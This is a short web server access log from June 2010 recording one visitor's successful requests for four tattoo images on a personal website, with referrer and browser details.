63.194.250.181 - - [26/Jun/2010:23:59:03 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 GTB7.0 (.NET CLR 3.5.30729)"
63.194.250.181 - - [26/Jun/2010:23:59:03 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 GTB7.0 (.NET CLR 3.5.30729)"
63.194.250.181 - - [26/Jun/2010:23:59:03 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 GTB7.0 (.NET CLR 3.5.30729)"
63.194.250.181 - - [26/Jun/2010:23:59:03 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 GTB7.0 (.NET CLR 3.5.30729)"
